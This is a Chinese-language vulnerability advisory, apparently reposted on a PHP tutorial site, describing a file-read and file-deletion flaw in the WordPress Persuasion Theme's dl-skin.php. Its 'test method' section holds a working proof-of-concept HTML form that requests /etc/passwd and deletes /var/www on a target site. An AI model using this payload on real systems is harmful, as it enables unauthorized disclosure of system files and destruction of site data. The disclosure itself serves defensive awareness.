来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 漏洞起因输入验证错误危险等级中影响系统Wordpress Persuasion Theme 2 0Wordpress Persuasion Theme 2 3不受影响系统危害远程攻击者可以利用漏洞获取系统文件内容。CVSSv2:攻击所需条件攻击者必须访...
|
漏洞起因
输入验证错误
危险等级
中
影响系统
Wordpress Persuasion Theme 2.0
Wordpress Persuasion Theme 2.3
不受影响系统
危害
远程攻击者可以利用漏洞获取系统文件内容。
CVSSv2:
攻击所需条件
攻击者必须访问WordPress Persuasion Theme。
漏洞信息
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。
WordPress Persuasion Theme 'dl-skin.php'不正确校验用户提交的输入,允许远程攻击者利用漏洞提交特殊的请求,获取系统文件内容。
测试方法
<html> <body> <form action="http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="post"> Existing file's name:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br> Directory to be removed:<input type="text" name="_mysite_delete_skin_zip" value="/var/www"><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br> <input type="submit"> </form> </body> </html>
安全建议
厂商解决方案
目前没有详细解决方案提供:
http://mysitemyway.com/
漏洞提供者
Interference Security
漏洞消息链接
http://www.exploit-db.com/exploits/30443/
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
